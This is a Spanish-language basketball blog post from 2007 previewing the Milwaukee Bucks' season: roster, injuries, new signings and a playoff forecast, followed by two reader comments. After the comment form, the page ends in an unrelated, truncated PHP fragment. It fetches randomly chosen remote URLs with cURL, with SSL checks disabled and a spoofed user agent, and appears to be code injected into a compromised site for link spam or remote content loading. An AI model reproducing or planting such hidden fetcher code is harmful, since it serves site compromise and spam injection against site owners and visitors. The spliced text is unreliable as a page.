Milwaukee Bucks: como si nada hubiera pasado

18 de September de 2007 por txusma

Michael ReddEl año pasado se presumía que iba a ser el de los Bucks. Después del trade que llevó a TJ Ford a Toronto a cambio de Charlie Villanueva y las presumibles mejoras de Andrew Bogut y Bobby Simmons, Milwaukee por fin había conseguido disponer de un quinteto de calidad perfectamente compensado. Con Michael Redd como estilete principal se postulaban como claros candidatos a entrar en Playoffs y, una vez allí, nadie sabía cuál iba ser su techo.

Pero rápidamente todo se torció: las lesiones de Simmons, Villanueva, Bogut, Williams y Redd dejaron buena parte de la temporada al equipo sin su teórico quinteto inicial y sus aspiraciones se vieron reducidas a la nada. Charlie Bell y Ruben Patterson se convirtieron durante muchos partidos en sus mejores hombres e incluso Boykins, que llegó al equipo a cambio de Steve Blake, tuvo momentos de gran protagonismo.

Esta temporada los Bucks quieren olvidar la mala fortuna que tuvieron la pasada campaña y apuestan de nuevo por el mismo bloque. Se trata de un equipo construido para atacar sin mirar atrás. Un equipo para tirar, correr y mover el balón, seguramente por este orden de prioridad. El quinteto titular estará comandado un año mas por un Michael Redd que año tras año mejora sus números y que se enfrenta a la que debería ser la temporada de su consagración definitiva. A su lado, Maurice Williams, un base que demostró el año pasado que puede echarse el equipo a las espaldas en caso de necesidad y acabar los partidos con números cercanos al triple doble, pero que no cuenta entre sus máximas virtudes con la dirección y la visión de juego, y Andrew Bogut, que ha de ser una pieza clave de este equipo y el jugador que convierta a los Bucks en un equipo serio, en lugar de ‘sólo’ un buen equipo como son ahora. Una de las otras 2 plazas del quinteto ha de ser para Charlie Villanueva. El jugador, hijo de padres dominicanos, ha pasado una temporada para olvidar en que sus constantes lesiones en el hombro sólo le han permitido jugar 39 de los 82 partidos. En todo caso, Villanueva demostró su valía como jugador en Toronto (primer rookie en anotar más de 40 puntos en un partido desde Allen Iverson en 1996) y los aficionados de los Bucks esperan que continúe la buena progresión que auguraba su inicio de la temporada pasada, antes de la lesión.

Más dudas surgen en la posición de SF: Bobby Simmons llegó hace 2 años procedente de Los Angeles Clippers tras una campaña excepcional, pero en su primera temporada en Milwaukee bajó sus prestaciones, presentando su candidatura al club del cazo mix: jugadores que se esfuerzan sólo el año en que acaba su contrato para pasar a emplearse con menor intensidad una vez firmado un jugoso aumento. El año pasado, cuando debía disipar todas las dudas que se cernían sobre él, se lesionó de gravedad antes del inicio de la liga regular y no pudo disputar siquiera un partido. Nadie sabe como afrontará Simmons esta nueva temporada ni cuál es su estado exacto tanto físico como mental, así que los Bucks han tenido que moverse en el mercado de agentes libres buscando un jugador que pudiera suplir a Simmons con garantías. Y de resultas de esta búsqueda ha vuelto a casa un viejo conocido, Desmond Mason, que retorna después de 2 años decepcionantes en los Hornets. Mason, que será junto a Redd y Voskhul el integrante más veterano de la plantilla, tiene la oportunidad de reecontrarse consigo mismo en el estilo ofensivo de los Bucks y, al lado nuevamente de Redd, convertirse en una gran amenaza ofensiva. Otra opción es la entrada en el quinteto de Charlie Bell. El jugador, ex del Leche Río Breogán de la ACB, parecía tener pie y medio fuera del equipo con sus comentarios en los que declaraba su falta de interés en volver a la disciplina de los Bucks. Pero éstos igualaron una oferta de los Heats por el escolta y por ahora Bell sigue siendo jugador verde. Se trata de una adquisición muy interesante por que refuerza de manera muy importante la profundidad y calidad de la plantilla. Pero no acaban aquí las opciones ya que hace pocos días se confirmó la llegada al equipo del chino Yi Jianlian, un jugador de 2’10 muy atlético que tiene un cuerpo de C, actúa en la posición de PF, pero juega como un SF. Desde su entrada en los mocks del draft de 2007, las comparaciones con Kevin Garnett saltaron a la palestra y ahora es el momento de demostrar tanta excelencia.

El resto de jugadores de los Bucks no están llamados a representar un papel destacado este año, por lo que la falta de banquillo se puede convertir en un problema a largo plazo y más si las lesiones vuelven a aflorar como ya lo hicieron la pasada temporada. Las bajas confirmadas de Ruben Patterson y Earl Boykins dejan a la segunda unidad formada por jugadores muy jovenes que apenas han contado con oportunidades anteriormente y con 2 centers veteranos como son Gadzuric y Voskhul.

Aparte de la falta de profundidad del banquillo, el defecto principal de este equipo es su poco trabajo defensivo. Individualmente ninguno de sus jugadores destaca por ser un gran defensor y en ocasiones destacan por lo contrario, como en el caso de Andrew Bogut, de quien a veces se ha comentado que es aún excesivamente blando. Tampoco el entrenador parece que quiera solucionar este problema, por lo que lo más probables es que nos entrentengamos mucho con los Bucks y veamos partidos a más de 100 puntos.

Probable quinteto: Maurice Williams, Michael Redd, Bobby Simmons, Charlie Villanueva, Andrew Bogut
Sexto hombre: Desmond Mason/Charlie Bell

Pronóstico: 1ª ronda de Playoffs

Comenta

2 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Desmond Mason… creo que voy a soltar una lagrimilla de emoción…

      Citar

  2. txusma dice:
    #2

    Primer comentario en este artículo 5 años después… XD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>